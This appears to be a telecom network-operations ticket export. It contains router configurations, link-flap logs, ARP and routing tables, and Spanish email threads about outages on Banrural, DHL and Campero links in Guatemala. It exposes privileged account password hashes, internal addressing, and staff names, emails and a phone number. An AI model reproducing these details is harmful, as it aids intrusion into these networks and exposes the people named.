IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.16.127.1 220 NAME RESPALDO
!
!
IP PREFIX-LIST CONNECTED SEQ 15 PERMIT 10.164.15.0/24
IP PREFIX-LIST CONNECTED SEQ 20 PERMIT 10.161.30.0/24
IP PREFIX-LIST CONNECTED SEQ 25 PERMIT 10.131.30.16/29
IP PREFIX-LIST CONNECTED SEQ 30 PERMIT 10.212.122.40/30
IP PREFIX-LIST CONNECTED SEQ 35 PERMIT 10.212.122.43/32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BARRIO LA PLAZUELA GRANADOS,BAJA VERAPA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NTP SERVER 10.16.211.193
!
END
CC_BANRURAL_GT_AGENCIA_0130#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 1557 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 1557 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 1560 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
02:53.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:03:01.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:03:02.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:03:08.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:03:09.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:03:31.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:03:32.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:05:58.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:05:59.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:06:07.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:06:08.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:06:17.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:06:18.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:06:22.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:06:23.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:06:33.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:06:34.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:06:42.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:06:43.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:06:51.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:06:52.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:07:08.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:07:09.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:08:07.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:08:08.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:08:17.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:08:18.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:08:23.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:08:24.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:08:28.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:08:29.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:08:39.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:08:40.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:08:49.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:08:50.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:08:56.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:08:57.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:09:05.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:09:06.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:09:12.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:09:13.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:09:17.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:09:18.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:09:28.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:09:29.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:09:37.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:09:38.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:09:45.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:09:46.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:09:57.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:09:58.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:10:01.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:10:02.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:10:10.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:10:11.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:11:17.028 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:11:18.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:11:27.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:11:28.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:11:33.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:11:34.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:11:42.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:11:43.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:11:49.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:11:50.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:11:59.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:12:00.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:12:05.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:12:06.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:12:15.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:12:16.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:12:22.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:12:23.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:12:27.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:12:28.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:12:38.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:12:39.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN 19 23:12:50.016 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN 19 23:12:51.016 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
CC_BANRURAL_GT_AGENCIA_0130#
SHOW CLOCK
*00:46:59.359 GUA MON JUN 20 2022
CC_BANRURAL_GT_AGENCIA_0130#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.16.127.1             0   B443.2600.D9AD  ARPA   GIGABITETHERNET0/1
INTERNET  10.16.127.51            -   58F3.9CCD.0A81  ARPA   GIGABITETHERNET0/1
INTERNET  10.16.245.129           2   B443.2673.0FBE  ARPA   GIGABITETHERNET0/0
INTERNET  10.16.245.154          15   3458.40C8.47A0  ARPA   GIGABITETHERNET0/0
INTERNET  10.16.245.157           -   58F3.9CCD.0A80  ARPA   GIGABITETHERNET0/0
INTERNET  10.131.30.17            -   58F3.9CCD.0A83  ARPA   VLAN1
INTERNET  10.131.30.22            0   F08E.DB17.A5A6  ARPA   VLAN1
INTERNET  10.161.30.126           -   58F3.9CCD.0A83  ARPA   VLAN1
CC_BANRURAL_GT_AGENCIA_0130#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/8901936T/_/
GI0/1                          UP             UP       WAN REDUNDANTE/_/8902324T/_/
GI0/0/0                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/0/1                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/0/2                        UP             UP       LAN DEL CLIENTE
GI0/0/3                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
VL184                          DOWN           DOWN
CC_BANRURAL_GT_AGENCIA_0130#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.16.245.157   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         10.16.127.51    YES NVRAM  UP                    UP
GIGABITETHERNET0/0/0       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0/1       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0/2       UNASSIGNED      YES UNSET  UP                    UP
GIGABITETHERNET0/0/3       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
LOOPBACK5                  10.212.122.43   YES NVRAM  UP                    UP
VLAN1                      10.161.30.126   YES NVRAM  UP                    UP
VLAN184                    UNASSIGNED      YES UNSET  DOWN                  DOWN
CC_BANRURAL_GT_AGENCIA_0130#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN BANRURAL 10.16.127.51
  PING 10.16.127.51: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.16.127.51 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 45/48/59 MS
RUTA IP:
PE: 10.179.28.14
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.16.127.51
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.16.127.51/32  DIRECT  0    0                 0.0.0.0         VLANIF2249			</t>
  </si>
  <si>
    <t>F4608215</t>
  </si>
  <si>
    <t>***--- CL AUTORIZA CIERRE DE SD --**
DE: BRUGADA HERNANDEZ DANIEL [MAILTO:DBRUGADA@UNINET.COM.MX]
ENVIADO EL: LUNES, 20 DE JUNIO DE 2022 01:44
PARA: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL DHL_277200005_210COMBEX ::: TICKET CNOC IMDHG006766 ::: "FUERA DE SERVICIO"
GRACIAS POR LA INFORMACIÓN, PROCEDEMOS AL CIERRE.</t>
  </si>
  <si>
    <t>DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: LUNES, 20 DE JUNIO DE 2022 1:18
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; BRUGADA HERNANDEZ DANIEL &lt;DBRUGADA@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL DHL_277200005_210COMBEX ::: TICKET CNOC IMDHG006766 ::: "FUERA DE SERVICIO"
ESTIMADO CLIENTE SU ENLACE FUE AFECTADO POR UN REINICIO POR UN EQUIPO DE ACCESO A LA RED (  ELGIN ID 112 POR EL CUAL PASA SU SERVICIO YA SE ENCUENTRA RESTABLECIDO SOLICITAMOS SU APOYO PARA LA VALIDACIÓN DE EL RESTABLECIMIENTO CORRECTO DEL SERVICIO.
PING -Q -C 100 -S 100 -M 5 -VPN DHL_TELMEX 187.128.59.126
  PING 187.128.59.126: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 187.128.59.126 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/8 MS
A ESPERA DE SUS COMENTARIOS.</t>
  </si>
  <si>
    <t xml:space="preserve">SERIVCIO AFECTADO POR RIR 5483345 ELGIN ID 112 YA SE ENCUENTRA ARRIVA SE VALIDARA CON EL CLIENTE.
PING -Q -C 100 -S 100 -M 5 -VPN DHL_TELMEX 187.128.59.126
  PING 187.128.59.126: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 187.128.59.126 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/8 MS
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
NO SE TIENE GESTION DEL CPE
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN DHL_TELMEX 187.128.59.126
  PING 187.128.59.126: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 187.128.59.126 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/8 MS
RUTA IP:
PE: 10.179.28.19
DISPLAY IP ROUTING-TABLE VPN-INSTANCE DHL_TELMEX 187.128.59.126
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : DHL_TELMEX
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
 187.128.59.124/30  DIRECT  0    0             D   187.128.59.125  50|100GE8/1/0.436			</t>
  </si>
  <si>
    <t>F4608218</t>
  </si>
  <si>
    <t>***--- TELMEX RESPONDE INDICANDO QUE EL SERVICIO CONTINUA FUERA ---**
DE: ESTRADA BUSTOS VICTOR MANUEL [MAILTO:VEBUSTOS@UNINET.COM.MX]
ENVIADO EL: LUNES, 20 DE JUNIO DE 2022 03:51
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 65400008T ::: TICKET CNOC IMDHE020866::: "FUERA DE SERVICIO "
EQUIPO,
SERVICIO CONTINUA FUERA.
PING 187.128.59.118
PING 187.128.59.118 (187.128.59.118) 56(84) BYTES OF DATA.
--- 187.128.59.118 PING STATISTICS ---
3 PACKETS TRANSMITTED, 0 RECEIVED, 100% PACKET LOSS, TIME 1999MS</t>
  </si>
  <si>
    <t>***--- SE RESPONDE CORREO A CL CON PRUBAS Y SE LE SOLICITA VALIDAR --***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: LUNES, 20 DE JUNIO DE 2022 03:49
PARA: ESTRADA BUSTOS VICTOR MANUEL &lt;VEBUSTOS@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 65400008T ::: TICKET CNOC IMDHE020866::: "FUERA DE SERVICIO "
BUENOS DÍAS ESTIMADO SR. ESTRADA.
                RESPECTO A SU SOLICITUD SE CUENTA CON EL TICKET SD1136523, ADJUNTO CORREO EN DONDE SE REALIZO LA APERTURA DEL MISMO.
PERSONAL A CARGO NOS INDICA QUE EL SERVICIO SE ENCUENTRA OPERATIVO Y SIN INTERVENCIÓN DE NUESTRA PARTE.
PING 187.128.59.118: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 187.128.59.118 PING STATISTICS ---
    10000 PACKET(S) TRANSMITTED
    10000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
PODRIA  APOYARNOS EN VALIDAR DESDE SU LADO E INDICARNOS SI PODRIAMOS CERRAR NUESTRO TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: ESTRADA BUSTOS VICTOR MANUEL [MAILTO:VEBUSTOS@UNINET.COM.MX]
ENVIADO EL: LUNES, 20 DE JUNIO DE 2022 03:43
PARA: FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; BYRON.JUAREZ@CLARO.COM.GT
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; ESTRADA BUSTOS VICTOR MANUEL &lt;VEBUSTOS@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 65400008T ::: TICKET CNOC IMDHE020866::: "FUERA DE SERVICIO "
EQUIPO SUP,
POR FAVOR DE SU APOYO PARA COMPARTIR NUMERO DE TICKET Y DIAGNOSTICO, GRACIAS.
   	VICTOR MANUEL ESTRADA BUSTOS
OPER CIAP GESTION Y SOPORTE SR
TEL. +52-55-5174-5299</t>
  </si>
  <si>
    <t>F4608222</t>
  </si>
  <si>
    <t xml:space="preserve">
SE PROCEDE CON CIERRE POR ENERGIA COMERCIAL EN EL PUNTO REMOTO
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 10 SEMANAS.
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.170 (AR100 V200R009C00SPC500)
COPYRIGHT (C) 2011-2018 HUAWEI TECH CO., LTD
HUAWEI AR109W ROUTER UPTIME IS 10 WEEKS, 3 DAYS, 7 HOURS, 5 MINUTES
MPU 0(MASTER) : UPTIME IS 10 WEEKS, 3 DAYS, 7 HOURS, 4 MINUTES
SDRAM MEMORY SIZE    : 512     M BYTES
FLASH 0 MEMORY SIZE  : 512     M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR129CGVW-L VER.C
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR109W
4. BOOTROM  VERSION  : 1
&lt;CC_CAMPERO_GT_INTERNET_C170&gt;
CONFIGURACION DEL CPE:
DISPLAY  CURRENT-CONFIGURATION
[V200R009C00SPC500]
#
 SYSNAME CC_CAMPERO_GT_INTERNET_C170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AME MONITOREO 2001
 DESCRIPTION NAT
 RULE 5 PERMIT SOURCE 10.168.120.0 0.0.0.255
ACL NUMBER 2005
 RULE 5 PERMIT SOURCE 10.0.0.0 0.255.255.255
 RULE 10 DENY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QOS QUEUE-PROFILE 30MBPS
#
FREE-RULE-TEMPLATE NAME DEFAULT_FREE_RULE
#
PORTAL-ACCESS-PROFILE NAME PORTAL_ACCESS_PROFILE
#
IP POOL 1
 GATEWAY-LIST 10.168.120.1
 NETWORK 10.168.120.0 MASK 255.255.255.0
 EXCLUDED-IP-ADDRESS 10.168.120.2 10.168.120.29
 LEASE DAY 24 HOUR 0 MINUTE 0
 DNS-LIST 216.230.147.90 216.230.128.32
#
AAA
 AUTHENTICATION-SCHEME DEFAULT
 AUTHENTICATION-SCHEME RADIUS
  AUTHENTICATION-MODE RADIUS
 AUTHORIZATION-SCHEME DEFAULT
 ACCOUNTING-SCHEME DEFAULT
 DOMAIN DEFAULT
  AUTHENTICATION-SCHEME DEFAULT
 DOMAIN DEFAULT_ADMIN
  AUTHENTICATION-SCHEME DEFAULT
 DOMAIN DEFAULT_GESTIONIP
  AUTHENTICATION-SCHEME RADIUS
  RADIUS-SERVER DEFAULT
 LOCAL-USER ADMIN PASSWORD IRREVERSIBLE-CIPHER %^%#:%/&amp;I&amp;PALY)&gt;6LVVI.OAZA/P;XA7WMQ.P8XYFJD0#T4M6H:~NKG.Q1H*D8OB%^%#
 LOCAL-USER ADMIN PRIVILEGE LEVEL 15
 LOCAL-USER ADMIN SERVICE-TYPE TERMINAL HTTP
 LOCAL-USER GESTIONIP PASSWORD IRREVERSIBLE-CIPHER %^%#~D];CB+A_2/~,C#JSQO(`Z@@E(K%MWI(_MREABS'0U.K9F.]AT}{6)TK2XKI%^%#
 LOCAL-USER GESTIONIP PRIVILEGE LEVEL 15
 LOCAL-USER GESTIONIP FTP-DIRECTORY FLASH:/
 LOCAL-USER GESTIONIP SERVICE-TYPE TELNET SSH FTP
#
WEB
 USER-SET DEFAULT
 USER-SET VIP
#
FIREWALL ZONE LOCAL
#
NAT ADDRESS-GROUP 1 200.6.233.250 200.6.233.250
#
INTERFACE VLANIF1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 200.6.233.249 255.255.255.252
 IP ADDRESS 10.168.120.1 255.255.255.0 SUB
 QOS CAR INBOUND CIR 5120 PIR 5120 CBS 1024000 PBS 2048000 GREEN PASS YELLOW PASS RED DISCARD
